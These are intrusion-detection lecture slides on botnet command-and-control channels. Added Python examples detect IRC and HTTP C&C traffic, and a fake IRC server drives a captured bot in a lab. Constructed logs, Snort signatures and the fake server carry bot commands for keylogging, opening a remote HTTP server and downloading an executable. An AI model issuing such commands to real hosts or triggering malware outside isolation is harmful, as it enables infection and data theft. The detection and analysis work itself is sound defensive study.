ISA 674
Intrusion Detection
Botnets:
Analysis of Command and Control Channels
& Signature Generation
Arnur Tokhtabayev, GMU
Malware Bot(net) Operation
1. Bot (trojan) delivery (e.g. drive-by via web browser, network service exploit, infection via USB drive)
2. Bot setup: turns the host into a zombie and connects it to the botnet (persist, conceal and communicate)
3. Stand-by mode (optional)
4. Execute commands (e.g. spamming, DoS, credential theft)
Picture source: Wikipedia (Tom-B)
How Botnets Work
1. The botmaster exploits the vulnerability on the victim.
2. The victim downloads the actual bot binary.
3. The bot contacts the IRC server address in the executable, including resolving the DNS name.
4. The bot joins an IRC channel.
5. The botmaster sends out commands via the IRC channel.
Bot C&C channel Requirements
- Stealthy
  - Avoid custom ports
  - Blend into normal traffic
- Availability
  - Common (public) protocol/service
  - Legitimate access to the channel (Windows API)
- Usability
  - Quality of service (application level protocol)
  - Command multicasting/broadcasting (control scalability)
  - Centralized vs P2P
  - Bandwidth is not important
Bot C&C channels
[Chart "Modern Techniques Trend": invisibility (vertical axis) against time (horizontal axis). C&C channel types on the invisibility axis, from top (most invisible) to bottom: DNS, Social Net, P2P, HTTP, IRC. Botnets plotted on the timeline: Agobot, Sdbot, m-IRC (<1 mil, 2004); Zeus (3.6 Mil); BredoLab (30 Mil bots, 2009); TDL4 (4.5 Mil bots, 2010); Conficker (10.5 Mil bots).]
The Threats from Botnets
Types of attack:
- DDoS attacks
- Spam
- Click fraud
- Spreading new malware
- Cracking
- Manipulating online polls
Botnet Detection
IRC botnet
- IRC port (may be a non-standard port)
- Monitor IRC payload for known commands
- Behavioral characteristics
  - Response: constant response time, fast join
  - Long-standing connection
  - Bots are not talkative
- Machine learning techniques
  - Use labeled data to build a classifier
- Track the botnet by honeypot
  - Use a honeypot to get infected
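The detection features on this slide (known commands in the payload regardless of port, fast join, long-standing and quiet connection, constant response time), run over two constructed IRC session logs. This is an added example, not code from the lecture; the log format, the command words beyond the bBot demo values, the "." command prefix and all thresholds are assumptions.

```python
"""Behavioural IRC C&C detector run over constructed session logs.

Added example; not code from the ISA 674 slides. Log format (assumed):
"<epoch seconds> <dir> <raw IRC line>", dir ">" = client-to-server,
"<" = server-to-client. Ports are ignored on purpose: the payload check
works on whatever port the bot picked.
"""
import re
import statistics

LINE_RE = re.compile(r"^(?P<ts>\d+(?:\.\d+)?) (?P<dir>[<>]) (?P<raw>.*)$")
PRIVMSG_RE = re.compile(r"^(?::\S+ )?PRIVMSG \S+ :(?P<text>.*)$")
# Command words from the bBot demo later on these slides (keylog, httpserver,
# d0wnl04d) plus two generic rBot-style verbs; the "." prefix is an assumption.
KNOWN_COMMANDS = re.compile(
    r"(?:^|\s)\.?(?:keylog|d0wnl04d|httpserver|download|ddos)\b", re.I)


def parse_session(lines):
    """Return [(timestamp, direction, raw_irc_line)], skipping malformed lines."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events.append((float(m["ts"]), m["dir"], m["raw"]))
    return events


def _has_command(raw):
    m = PRIVMSG_RE.match(raw)
    return bool(m and KNOWN_COMMANDS.search(m["text"]))


def features(events):
    """Per-connection features from the slide: join delay, connection age,
    talkativeness, response latency and its jitter, known-command hits."""
    t0, duration = events[0][0], events[-1][0] - events[0][0]
    join_delay = next((ts - t0 for ts, d, raw in events
                       if d == ">" and raw.upper().startswith("JOIN")), None)
    sent = [ts for ts, d, raw in events if d == ">" and PRIVMSG_RE.match(raw)]
    msgs_per_hour = len(sent) / (max(duration, 1.0) / 3600.0)

    # Delay from a channel message the client receives to its next PRIVMSG
    # (within 10 s). Bots answer at machine speed with almost no jitter.
    latencies = []
    for ts, d, raw in events:
        if d == "<" and PRIVMSG_RE.match(raw):
            reply = next((r for r in sent if 0 <= r - ts <= 10.0), None)
            if reply is not None:
                latencies.append(reply - ts)

    return {
        "join_delay": join_delay,
        "duration": duration,
        "msgs_per_hour": msgs_per_hour,
        "mean_latency": statistics.mean(latencies) if latencies else None,
        "jitter": statistics.pstdev(latencies) if len(latencies) >= 2 else None,
        "cmd_hits": sum(1 for _, _, raw in events if _has_command(raw)),
    }


def classify(feat):
    """Thresholds are assumptions chosen for this example, not from the slides."""
    reasons = []
    if feat["cmd_hits"]:
        reasons.append("known C&C command in payload")
    if feat["join_delay"] is not None and feat["join_delay"] < 2.0:
        reasons.append("fast join after connect")
    if feat["duration"] > 3600 and feat["msgs_per_hour"] < 10:
        reasons.append("long-standing but quiet connection")
    if feat["jitter"] is not None and feat["jitter"] < 0.1 and feat["mean_latency"] < 1.0:
        reasons.append("constant machine-speed response time")
    return ("bot" if len(reasons) >= 2 else "benign"), reasons


def analyze(lines):
    feat = features(parse_session(lines))
    verdict, reasons = classify(feat)
    return verdict, reasons, feat


# Constructed sessions, not real captures. The first mimics the bBot demo.
BOT_SESSION = [
    "1700000000.00 > NICK [M]bBot|4821",
    "1700000000.01 > USER bbot 0 * :bbot",
    "1700000000.20 < :botirc.net 001 [M]bBot|4821 :Welcome",
    "1700000000.25 > JOIN #test",
    "1700000000.40 < :[M]bBot|4821!bbot@10.0.0.5 JOIN :#test",
    "1700003600.00 < :master!m@h PRIVMSG #test :.keylog on",
    "1700003600.21 > PRIVMSG #test :[KEYLOG]: Key logger active.",
    "1700007200.00 < :master!m@h PRIVMSG #test :.httpserver 8080",
    "1700007200.20 > PRIVMSG #test :[HTTPD]: Server listening on port 8080.",
    "1700010800.00 < :master!m@h PRIVMSG #test :.d0wnl04d http://10.0.0.9/u.exe u.exe",
    "1700010800.22 > PRIVMSG #test :[DOWNLOAD]: Downloading URL.",
]
HUMAN_SESSION = [
    "1700000000.00 > NICK alice",
    "1700000000.01 > USER alice 0 * :Alice",
    "1700000000.30 < :irc.example.net 001 alice :Welcome",
    "1700000045.00 > JOIN #lunch",
    "1700000045.20 < :alice!a@h JOIN :#lunch",
    "1700000050.00 < :bob!b@h PRIVMSG #lunch :anyone up for pizza?",
    "1700000063.00 > PRIVMSG #lunch :sure, 12:30?",
    "1700000070.00 < :bob!b@h PRIVMSG #lunch :works for me",
    "1700000071.50 > PRIVMSG #lunch :see you there",
    "1700000200.00 > PRIVMSG #lunch :brb",
    "1700000900.00 > QUIT :lunch",
]

if __name__ == "__main__":
    for name, log in (("bot", BOT_SESSION), ("human", HUMAN_SESSION)):
        verdict, reasons, feat = analyze(log)
        print(f"{name}: {verdict} {reasons}")
```

The payload check alone is brittle (a bot family with different verbs, or the randomized protocol discussed later in this deck, produces zero hits), which is why the verdict requires two independent signals; the timing and volume features need no knowledge of the command set.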
Why IRC?
Original motivation
- Internet Relay Chat (standard protocol)
- IRC is not firewalled by most users
- IRC traffic load is predictable (e.g. office usage pattern, 2-3 pm); bot traffic that follows it does not cause an anomaly
- IRC endpoints are 100% legal (known IRC servers)
- C&C commands blend in with normal data traffic
- Practically easy to avoid detection by a network-based IDS (e.g. Snort)
IRC Bot operation (server independence)
Source: http://www.windowsecurity.com/
Fighting with IRC C&C
Practical approaches
Prevention:
- Block IRC (port 6667); a bot may use a non-standard port, so port blocking alone is not enough
- Allow only certain IRC channels
- IRC channel remap via IRC proxy (potential)
Detection:
- Anomaly in IRC usage pattern (e.g. night-time IRC connections from office computers, previously unknown IRC channel, strange IRC server)
- IRC message correlation (e.g. consistent command/reply pattern)

Can black hats strike back?

Smart IRC C&C:
- Randomize IRC commands and replies (generate a unique communication protocol at each host)
- Collect usage patterns and blend in (utilize/piggyback on users' IRC channels)
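The two detection bullets above (usage-pattern anomaly, command/reply correlation) and the "smart C&C" counter-move, worked in Python. This is an added example and not part of the slides; the channel events, hosts, server allowlist, office hours and thresholds are constructed assumptions. Once the bot randomizes its command and reply strings, content matching has nothing to look for, but several hosts answering the same nick within a fraction of a second, round after round, still stands out.

```python
"""Correlation detection for IRC C&C that randomises its command strings.

Added example, not from the slides. Events are a constructed list of
(epoch seconds, source nick, text) for one channel. The randomised
vocabulary leaves no payload string to match; the timing correlation
below does not need one.
"""
from collections import Counter
import datetime as dt

WINDOW = 2.0       # seconds after a message in which replies count as correlated (assumed)
MIN_REPLIERS = 3   # distinct hosts answering in lockstep (assumed threshold)
MIN_ROUNDS = 2     # how many times the same group must do it (assumed threshold)


def lockstep_groups(events):
    """Return {(commander, frozenset(repliers)): rounds} for groups that
    repeatedly answer one nick's message within WINDOW seconds."""
    events = sorted(events)
    rounds = Counter()
    i = 0
    while i < len(events):
        ts, src, _ = events[i]
        j, repliers = i + 1, set()
        while j < len(events) and events[j][0] - ts <= WINDOW:
            if events[j][1] != src:
                repliers.add(events[j][1])
            j += 1
        if len(repliers) >= MIN_REPLIERS:
            rounds[(src, frozenset(repliers))] += 1
            i = j          # these replies belong to this round; do not re-count them
        else:
            i += 1
    return {k: n for k, n in rounds.items() if n >= MIN_ROUNDS}


OFFICE_HOURS = range(8, 19)              # 08:00-18:59, assumed local policy
KNOWN_SERVERS = {"irc.corp.example"}     # assumed allowlist of sanctioned servers


def usage_anomalies(connections, tz=dt.timezone.utc):
    """connections: [(epoch seconds, host, irc server)] -> [(host, server, reasons)]
    for the usage-pattern anomalies on the slide: off-hours use, unknown server."""
    findings = []
    for ts, host, server in connections:
        hour = dt.datetime.fromtimestamp(ts, tz).hour
        reasons = []
        if hour not in OFFICE_HOURS:
            reasons.append(f"IRC connection at {hour:02d}:00")
        if server not in KNOWN_SERVERS:
            reasons.append(f"unknown IRC server {server}")
        if reasons:
            findings.append((host, server, reasons))
    return findings


# Constructed channel log: four bots with per-host randomised strings, two humans.
CHANNEL_EVENTS = [
    (1700000000.0, "master", "q7x1 pv"),            # round 1: command, then four replies
    (1700000000.3, "host-a", "k2 ok91"),
    (1700000000.4, "host-b", "zz-1"),
    (1700000000.4, "host-c", "mm8"),
    (1700000000.6, "host-d", "3f3f"),
    (1700000120.0, "alice", "anyone seen the build break?"),
    (1700000135.0, "bob", "yes, looking at it"),
    (1700000140.0, "alice", "thanks"),
    (1700000600.0, "master", "r8tt 0x"),            # round 2: different strings, same group
    (1700000600.2, "host-c", "a1"),
    (1700000600.3, "host-a", "bb77"),
    (1700000600.5, "host-d", "n0"),
    (1700000600.5, "host-b", "p"),
    (1700000900.0, "bob", "fixed, merging"),
    (1700000901.0, "alice", "nice"),
]
CONNECTIONS = [
    (1700000000.0, "host-a", "botirc.net"),          # 22:13 UTC, server not on the allowlist
    (1700036000.0, "alice-pc", "irc.corp.example"),  # 08:13 UTC, sanctioned server
]

if __name__ == "__main__":
    for (commander, group), n in lockstep_groups(CHANNEL_EVENTS).items():
        print(f"{commander} commands {sorted(group)} ({n} rounds)")
    for host, server, reasons in usage_anomalies(CONNECTIONS):
        print(f"{host} -> {server}: {'; '.join(reasons)}")
```

The second counter-move on the slide, piggybacking on channels users already frequent, defeats the allowlist check but not the lockstep check: the bots still have to answer together, in whichever channel they hide.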
Network Intrusion Detection System (NIDS)
BotNet C&C detection
- NIDS: Snort, Bro
- Traffic analysis
- Network traffic (packet) capture: Wireshark, tcpdump, ngrep, Ettercap*
- Capture libraries: libpcap, WinPcap
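As an added example of the signature side (not a rule set from the slides or from the Snort project), three local Snort rules written for the bBot demo later on this page; the "." command prefix, the nick pattern and the sid numbers are assumptions:

```snort
# local.rules, added example (not from the slides). sid values are arbitrary
# local numbers (>= 1000000); $HOME_NET and $EXTERNAL_NET come from snort.conf.

# C&C verbs from the bBot demo (keylog, httpserver, d0wnl04d) inside an IRC
# PRIVMSG on ANY port, since a bot need not use 6667. The "." prefix is assumed.
alert tcp $EXTERNAL_NET any -> $HOME_NET any ( \
    msg:"IRC C&C command to bot (bBot/rBot style)"; \
    flow:established,to_client; content:"PRIVMSG "; nocase; \
    pcre:"/PRIVMSG\s+\S+\s+:\.?(keylog|httpserver|d0wnl04d)\b/i"; \
    classtype:trojan-activity; sid:1000001; rev:1;)

# Generated bot nick of the form "[M]bBot|1234" during registration.
alert tcp $HOME_NET any -> $EXTERNAL_NET any ( \
    msg:"IRC bot-style NICK registration"; \
    flow:established,to_server; content:"NICK "; depth:5; nocase; \
    pcre:"/^NICK\s+\[[A-Z]{1,3}\]\w*Bot\|\d{3,5}/i"; \
    classtype:trojan-activity; sid:1000002; rev:1;)

# JOIN to an IRC channel on a port other than 6667: not proof of a bot, but it
# is exactly the traffic a "block port 6667" policy misses.
alert tcp $HOME_NET any -> $EXTERNAL_NET !6667 ( \
    msg:"IRC JOIN on non-standard port"; \
    flow:established,to_server; content:"JOIN #"; depth:6; nocase; \
    classtype:policy-violation; sid:1000003; rev:1;)
```

Content rules only catch strings you already know; a bot family with renamed verbs, or the randomized protocol discussed in the "smart C&C" slide, walks past all three, which is why the behavioral features on the detection slide are needed alongside signatures.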
[Screenshots: bot generators (SpyEye). Screenshots were obtained from public web-sites.]
Analyzing IRC Bot
Tasks:
1. Reverse engineer the image
   - IRC server ID, channel and user names (generator)
   - C&C commands
2. Set up an environment (fake IRC server, IRC client)
3. Trigger bot commands (send IRC command messages and observe the malware's behavior)
Demo: bBot (rBot based)
Parameter                 Value
IRC session:
  IRC server name         botirc.net (static)
  IRC channel name        #test
  IRC user name           [M]bBot|XXXX
C&C commands:
  Log keys                keylog file
  Remote access to host   httpserver
  Download a file         d0wnl04d
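The three analysis tasks from the previous slide, carried through on the bBot demo values (botirc.net, #test, [M]bBot|XXXX, d0wnl04d). This is an added example and not code from the slides, from bBot or from rBot; BOT_IMAGE is a constructed byte string standing in for the bot image, and the command argument layout "d0wnl04d <url> <file>" is an assumption.

```python
"""Analysing an IRC bot image and driving it from a fake IRC server.

Added example; not code from the slides, bBot or rBot. Task 1 pulls the
C&C parameters out of the bot image, tasks 2 and 3 stand up a fake server
and trigger a command. BOT_IMAGE is constructed; the argument layout of
"d0wnl04d <url> <file>" is an assumption.
"""
import re
import socket

STRING_RE = re.compile(rb"[\x20-\x7e]{4,}")                # printable runs, like strings(1)
HOST_RE = re.compile(r"^[a-z0-9-]+(?:\.[a-z0-9-]+)+$", re.I)
CHANNEL_RE = re.compile(r"^#[^\s,]+$")
NICK_RE = re.compile(r"^\[[A-Z]{1,3}\].*\|")                 # rBot-style "[M]bBot|"


def extract_irc_config(image):
    """Task 1: sort printable strings into server / channel / nick candidates.
    Everything else is left for manual triage; the C&C verbs live there."""
    cfg = {"servers": [], "channels": [], "nicks": [], "other": []}
    for m in STRING_RE.finditer(image):
        s = m.group().decode("ascii")
        if HOST_RE.match(s) and not s.lower().endswith((".dll", ".exe")):
            cfg["servers"].append(s)      # import names also look like hostnames
        elif CHANNEL_RE.match(s):
            cfg["channels"].append(s)
        elif NICK_RE.match(s):
            cfg["nicks"].append(s)
        else:
            cfg["other"].append(s)
    return cfg


class FakeIrcServer:
    """Tasks 2 and 3: a minimal IRC server state machine. handle() takes one
    line from the bot and returns the lines to send back; the botmaster's
    command is injected as soon as the bot has joined the channel."""

    def __init__(self, server="botirc.net", master="master",
                 command="d0wnl04d http://127.0.0.1/u.exe u.exe"):
        self.server, self.master, self.command = server, master, command
        self.nick, self.user, self.welcomed, self.joined = None, False, False, None
        self.responses = []   # what the bot says back in the channel

    def handle(self, line):
        line = line.strip()
        parts = line.split(" ")
        cmd = parts[0].upper()
        if cmd in ("NICK", "USER"):
            if cmd == "NICK":
                self.nick = parts[1]
            else:
                self.user = True
            if self.nick and self.user and not self.welcomed:
                self.welcomed = True      # 001 only once both NICK and USER are in
                return [f":{self.server} 001 {self.nick} :Welcome to the fake network"]
            return []
        if cmd == "PING":
            return [f":{self.server} PONG {self.server} :{' '.join(parts[1:]).lstrip(':')}"]
        if cmd == "JOIN" and self.welcomed:
            self.joined = parts[1].split(",")[0]
            return [
                f":{self.nick}!bot@127.0.0.1 JOIN :{self.joined}",
                f":{self.server} 366 {self.nick} {self.joined} :End of /NAMES list.",
                # the "botmaster" speaks: this is the trigger for task 3
                f":{self.master}!m@127.0.0.1 PRIVMSG {self.joined} :{self.command}",
            ]
        if cmd == "PRIVMSG" and " :" in line:
            self.responses.append(line.split(" :", 1)[1])   # bot's reply, observe it
        return []


def serve_one_bot(port=6667, host="127.0.0.1", **kw):
    """Bind the fake server, take one bot connection, run it through handle()
    until QUIT or disconnect, and return the server with the bot's responses.
    Point the bot at it by resolving botirc.net to this host (hosts file or fake DNS)."""
    srv = FakeIrcServer(**kw)
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as ls:
        ls.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        ls.bind((host, port))
        ls.listen(1)
        conn, _ = ls.accept()
        with conn, conn.makefile("rb") as rd:
            for raw in rd:
                line = raw.decode("utf-8", "replace")
                for out in srv.handle(line):
                    conn.sendall((out + "\r\n").encode())
                if line.upper().startswith("QUIT"):
                    break
    return srv


# Constructed bot image: a PE-looking header, the demo parameters, an import name.
BOT_IMAGE = (b"MZ\x90\x00" + b"\x00" * 16
             + b"botirc.net\x00\x00\x00#test\x00[M]bBot|\x00"
             + b"keylog\x00httpserver\x00d0wnl04d\x00KERNEL32.dll\x00")

if __name__ == "__main__":
    print(extract_irc_config(BOT_IMAGE))
    serve_one_bot()   # then start the bot in the isolated lab VM
```

Run this only on an isolated lab network: once the bot joins, it will act on whatever command the fake server sends, and a real download URL or an httpserver on a routable interface exposes the analysis host.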
Control and Command Infrastructure
- IRC-based
- P2P botnet
  - Servent (server + client) bots
  - Client bots
  - Communicate via peer list
    - Only servent bots are in the peer list
  - Avoids a single point of failure
Control and Command Infrastructure
HTTP botnet
- The bot contacts the C&C server with its info embedded in the URL.
- Attackers send commands via the HTTP response.
- Communication hides in the noise of ordinary HTTP traffic.
- Example: Bobax Trojan
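Detection side of the HTTP channel described above, as an added example (not from the slides or from Bobax): proxy log lines, constructed here in an assumed format, grouped by client and URL path and flagged when the query string carries identity-looking parameters and the polling interval is nearly constant. The parameter names treated as telltale are an assumption.

```python
"""Spotting HTTP-based C&C beacons in web-proxy logs.

Added example, not from the slides or from Bobax. Input lines are constructed
in an assumed "epoch client_ip METHOD url status" format. The bot embeds its
identity in the URL and polls on a timer; the commands ride back in the
response body, which a proxy log does not show, so detection here rests on
the URL shape and the polling rhythm.
"""
from collections import defaultdict
import statistics
from urllib.parse import urlsplit, parse_qs

# Query parameter names that tend to carry bot identity (assumed list).
ID_KEYS = {"id", "uid", "bot", "host", "hwid", "mac", "os", "ver"}


def parse_log(lines):
    """Return [(timestamp, client, method, url, status)]."""
    out = []
    for line in lines:
        ts, client, method, url, status = line.split()
        out.append((float(ts), client, method, url, int(status)))
    return out


def beacon_candidates(records, min_hits=4, max_jitter=0.15):
    """Group requests by (client, host, path); flag groups that poll at a
    regular interval AND carry identity-looking query parameters."""
    groups = defaultdict(list)
    for ts, client, _, url, _ in records:
        u = urlsplit(url)
        groups[(client, u.hostname, u.path)].append((ts, parse_qs(u.query)))
    findings = []
    for (client, host, path), reqs in groups.items():
        if len(reqs) < min_hits:
            continue
        times = sorted(ts for ts, _ in reqs)
        gaps = [b - a for a, b in zip(times, times[1:])]
        period = statistics.mean(gaps)
        # relative jitter: std-dev of the gaps over the mean gap
        jitter = statistics.pstdev(gaps) / period if period else float("inf")
        id_params = sorted({k for _, q in reqs for k in q if k.lower() in ID_KEYS})
        if jitter <= max_jitter and id_params:
            findings.append({"client": client, "host": host, "path": path,
                             "period_s": round(period, 1), "jitter": round(jitter, 3),
                             "id_params": id_params})
    return findings


# Constructed proxy log. 10.0.0.5 is the bot; the other two hosts show the
# two ways a single signal misleads: identity-like params without rhythm,
# and rhythm without identity.
PROXY_LOG = [
    "1700000000 10.0.0.5 GET http://update-check.example/gate.php?id=7f3a&os=xp&ver=1.2 200",
    "1700000300 10.0.0.5 GET http://update-check.example/gate.php?id=7f3a&os=xp&ver=1.2 200",
    "1700000601 10.0.0.5 GET http://update-check.example/gate.php?id=7f3a&os=xp&ver=1.2 200",
    "1700000899 10.0.0.5 GET http://update-check.example/gate.php?id=7f3a&os=xp&ver=1.2 200",
    "1700001200 10.0.0.5 GET http://update-check.example/gate.php?id=7f3a&os=xp&ver=1.2 200",
    "1700000010 10.0.0.7 GET http://news.example/ 200",
    "1700000047 10.0.0.7 GET http://news.example/story?id=123 200",
    "1700000050 10.0.0.7 GET http://news.example/story?id=124 200",
    "1700000320 10.0.0.7 GET http://news.example/story?id=980 200",
    "1700001500 10.0.0.7 GET http://news.example/story?id=981 200",
    "1700000000 10.0.0.8 GET http://updates.example/check 304",
    "1700000600 10.0.0.8 GET http://updates.example/check 304",
    "1700001200 10.0.0.8 GET http://updates.example/check 304",
    "1700001800 10.0.0.8 GET http://updates.example/check 304",
]

if __name__ == "__main__":
    for f in beacon_candidates(parse_log(PROXY_LOG)):
        print(f)
```

To see the command itself you need the response body, i.e. a full packet capture or a proxy that logs bodies; a bot that adds random sleep to its polling interval pushes the jitter above the threshold, so in practice the threshold is tuned per environment and combined with reputation of the destination host.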
Control and Command Infrastructure
IM botnet
- Send commands to all bots on the contact list via instant message.
- The botmaster only needs to send a small number of messages.
  - Each recipient can then spread them to its own contacts, and so on.
- Example: Sdbot, spreading via AIM.
Contact info
Dr. Arnur Tokhtabayev
Center for Secure Information Systems
George Mason University
Computer Science Department
Research I, Rm 435
E-mail: atokhtab@gmu.edu, arnur78@gmail.com